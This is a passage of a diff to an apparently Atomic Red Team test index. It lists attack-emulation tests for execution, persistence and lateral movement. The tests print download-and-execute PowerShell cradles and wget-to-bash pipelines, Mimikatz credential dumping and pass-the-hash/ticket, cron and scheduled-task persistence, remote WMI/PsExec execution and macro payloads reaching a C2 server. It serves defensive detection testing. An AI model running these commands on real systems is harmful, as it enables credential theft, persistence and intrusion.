#{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1053.003: @@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1610: technique: external_references: @@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word - ' +' supported_platforms: - windows executor: @@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script - ' +' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx - ' +' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl - ' +' supported_platforms: - macos input_arguments: @@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} - ' +' cleanup_command: 'launchctl remove #{label_name} - ' +' name: bash T1053.004: technique: @@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product: @@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file - ' +' supported_platforms: - windows input_arguments: @@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed - ' +' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null @@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" - ' +' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' - description: 'Google Chrome must be installed - ' +' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta - ' +' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature @@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). - ' +' supported_platforms: - windows input_arguments: @@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro - ' +' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. - ' +' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. @@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel - ' +' type: String default: Word dependency_executor_name: powershell @@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. - ' +' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) - ' +' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" - ' +' - description: 'Microsoftt #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: name: powershell command: | @@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore - ' +' T1204.003: technique: external_references: @@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" - ' +' name: command_prompt elevation_required: true - name: Run BloodHound from local disk @@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" - ' +' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - ' +' supported_platforms: - windows executor: @@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. - ' +' supported_platforms: - windows executor: @@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" - ' +' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da @@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" - ' +' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" - ' +' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" - ' +' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed - ' +' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually - ' +' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion - ' +' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive - ' +' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically - ' +' executor: name: powershell command: | @@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore - ' +' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled - ' +' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting - ' +' executor: name: powershell elevation_required: true @@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments @@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} - ' +' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" - ' +' executor: name: powershell elevation_required: true @@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia - ' +' supported_platforms: - windows executor: @@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests - ' +' executor: command: | which_python=$(which python || which python3 || which python2) @@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments - ' +' supported_platforms: - linux input_arguments: @@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' @@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: @@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" - ' +' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} @@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. - ' +' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} - ' +' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt - ' +' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null - ' +' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -65488,7 +65488,7 @@ execution: cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore - ' +' name: powershell T1059.003: technique: @@ -65539,7 +65539,7 @@ execution: description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. - ' +' supported_platforms: - windows input_arguments: @@ -65555,27 +65555,27 @@ execution: dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path}) - ' +' prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path} - ' +' cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk. - ' +' supported_platforms: - windows input_arguments: @@ -65590,17 +65590,17 @@ execution: executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}" - ' +' cleanup_command: 'del "#{file_contents_path}" >nul 2>&1 - ' +' name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments: @@ -65691,7 +65691,7 @@ execution: executor: command: 'wmic useraccount get /ALL /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 @@ -65703,7 +65703,7 @@ execution: executor: command: 'wmic process get caption,executablepath,commandline /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 @@ -65715,7 +65715,7 @@ execution: executor: command: 'wmic qfe get description,installedOn /format:csv - ' +' name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 @@ -65739,7 +65739,7 @@ execution: executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%") - ' +' name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 @@ -65756,11 +65756,11 @@ execution: executor: command: 'wmic process call create #{process_to_execute} - ' +' cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b @@ -65791,11 +65791,11 @@ execution: command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} - ' +' cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1 - ' +' name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c @@ -65812,7 +65812,7 @@ execution: executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA - ' +' name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 @@ -65846,7 +65846,7 @@ execution: description: 'This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. - ' +' supported_platforms: - windows input_arguments: @@ -65870,12 +65870,12 @@ execution: get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/bin/calc.dll?raw=true" -OutFile "#{dll_to_execute}" - ' +' executor: command: 'wmic /node:#{node} process call create "rundll32.exe #{dll_to_execute} #{function_to_execute}" - ' +' cleanup_command: taskkill /f /im calculator.exe name: powershell - name: Application uninstall using WMIC @@ -66198,7 +66198,7 @@ lateral-movement: command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") - ' +' name: powershell T1210: technique: @@ -66451,7 +66451,7 @@ lateral-movement: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -66466,13 +66466,13 @@ lateral-movement: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: @@ -66501,14 +66501,14 @@ lateral-movement: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n" name: command_prompt @@ -66589,7 +66589,7 @@ lateral-movement: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: @@ -66597,7 +66597,7 @@ lateral-movement: description: Ticket file name usually format of 'id-username\@domain.kirbi' (e.g. can be dumped by "sekurlsa::tickets /export" module) type: String - default: + default: mimikatz_exe: description: Path of the Mimikatz binary type: Path @@ -66606,10 +66606,10 @@ lateral-movement: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -66620,7 +66620,7 @@ lateral-movement: executor: command: '#{mimikatz_exe} "kerberos::ptt #{ticket}" - ' +' name: command_prompt - name: Rubeus Kerberos Pass The Ticket auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb @@ -66663,19 +66663,19 @@ lateral-movement: dependencies: - description: 'Rubeus must exist on disk at specified location (#{rubeus_path}) - ' +' prereq_command: 'if (Test-Path #{rubeus_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{rubeus_path} - ' +' - description: 'PsExec must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path #{psexec_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -66769,7 +66769,7 @@ lateral-movement: net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1021.001: @@ -66841,7 +66841,7 @@ lateral-movement: auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController. - ' +' supported_platforms: - windows input_arguments: @@ -66864,15 +66864,15 @@ lateral-movement: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | $Server=#{logonserver} @@ -66889,7 +66889,7 @@ lateral-movement: auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell - ' +' supported_platforms: - windows input_arguments: @@ -66922,7 +66922,7 @@ lateral-movement: description: 'Changing RDP Port to Non Standard Port via 